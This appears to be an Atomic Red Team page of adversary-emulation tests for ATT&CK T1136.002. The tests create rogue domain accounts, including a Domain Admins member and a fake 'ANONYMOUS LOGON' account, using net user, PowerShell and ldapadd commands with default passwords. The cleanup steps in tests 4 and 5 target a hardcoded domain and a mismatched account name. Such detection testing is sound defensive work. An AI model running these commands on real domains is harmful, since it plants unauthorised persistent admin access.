Try it using Invoke-Atomic

Create Account: Domain Account

Description from ATT&CK

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.(Citation: Savill 1999)

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Atomic Tests

Atomic Test #1 - Create a new Windows domain admin user

Creates a new domain admin user in a command prompt.

Supported Platforms: windows

auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62

Inputs:

Name Description Type Default Value
username Username of the user to create string T1136.002_Admin
password Password of the user to create string T1136_pass123!
group Domain administrator group to which add the user to string Domain Admins

Attack Commands: Run with command_prompt!

1
2
net user "#{username}" "#{password}" /add /domain
net group "#{group}" "#{username}" /add /domain

Cleanup Commands:

1
net user "#{username}" >nul 2>&1 /del /domain

Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON

Create a new account similar to ANONYMOUS LOGON in a command prompt.

Supported Platforms: windows

auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548

Inputs:

Name Description Type Default Value
username Username of the user to create string ANONYMOUS LOGON
password Password of the user to create string T1136_pass123!

Attack Commands: Run with command_prompt!

1
net user "#{username}" "#{password}" /add /domain

Cleanup Commands:

1
net user "#{username}" >nul 2>&1 /del /domain

Atomic Test #3 - Create a new Domain Account using PowerShell

Creates a new Domain User using the credentials of the Current User

Supported Platforms: windows

auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7

Inputs:

Name Description Type Default Value
username Name of the Account to be created string T1136.002_Admin
password Password of the Account to be created string T1136_pass123!

Attack Commands: Run with powershell!

1
2
3
4
5
6
7
8
9
10
11
12
13
$SamAccountName = '#{username}'
$AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
$User.SamAccountName = $SamAccountName
$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
$User.SetPassword($TempCred.GetNetworkCredential().Password)
$User.Enabled = $True
$User.PasswordNotRequired = $False
$User.DisplayName = $SamAccountName
$User.Save()
$User

Cleanup Commands:

1
cmd /c "net user #{username} /del >nul 2>&1"

Atomic Test #4 - Active Directory Create Admin Account

Use Admin Credentials to Create A Domain Admin Account

Supported Platforms: linux

auto_generated_guid: 562aa072-524e-459a-ba2b-91f1afccf5ab

Inputs:

Name Description Type Default Value
domain The domain to be tested string example
top_level_domain The top level domain (.com, .test, .remote, etc… following domain, minus the .) string test
admin_user username@domain of a user with admin privileges string admin@example.test
admin_password password of the user with admin privileges referenced in admin_user string s3CurePssw0rD!
domain_controller Name of the domain_controller machine, defined in etc/hosts string adVM

Attack Commands: Run with sh!

1
2
3
echo "dn: CN=Admin User,CN=Users,DC=#{domain},DC=#{top_level_domain}\nchangetype: add\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Admin User\nsn: User\ngivenName: Atomic User\nuserPrincipalName: adminuser@#{domain}.#{top_level_domain}\nsAMAccountName: adminuser\nuserAccountControl: 512\nuserPassword: {CLEARTEXT}s3CureP4ssword123!\nmemberOf: CN=Domain Admins,CN=Users,DC=#{domain},DC=#{top_level_domain}" > tempadmin.ldif
echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif

Cleanup Commands:

1
2
3
4
5
echo removing Atomic User (temporary user)
echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
rm deleteuser.ldif
rm tempadmin.ldif

Dependencies: Run with sh!

Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available

Check Prereq Commands:

1
which ldapadd && which ldapmodify

Get Prereq Commands:

1
echo ldapadd or ldapmodify not found; exit 1

Atomic Test #5 - Active Directory Create User Account (Non-elevated)

Use Admin Credentials to Create A Normal Account (as means of entry)

Supported Platforms: linux

auto_generated_guid: 8c992cb3-a46e-4fd5-b005-b1bab185af31

Inputs:

Name Description Type Default Value
domain The domain to be tested string example
top_level_domain The top level domain (.com, .test, .remote, etc… following domain, minus the .) string test
admin_user username@domain of a user with admin privileges string user@example.test
admin_password password of the user string s3CurePssw0rD!
domain_controller Name of the domain_controller machine, defined in etc/hosts string adVM

Attack Commands: Run with sh!

1
2
3
echo "dn: cn=Atomic User, cn=Users,dc=#{domain},dc=#{top_level_domain}\nobjectClass: person\ncn: Atomic User\nsn: User" > tempadmin.ldif
echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif

Cleanup Commands:

1
2
3
4
5
echo removing Atomic User (temporary user)
echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
rm deleteuser.ldif
rm tempadmin.ldif

Dependencies: Run with sh!

Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapadd, ldapmodify

Check Prereq Commands:

1
2
which ldapadd
which ldapmodify

Get Prereq Commands:

1
echo ldapadd or ldapmodify not found; exit 1

source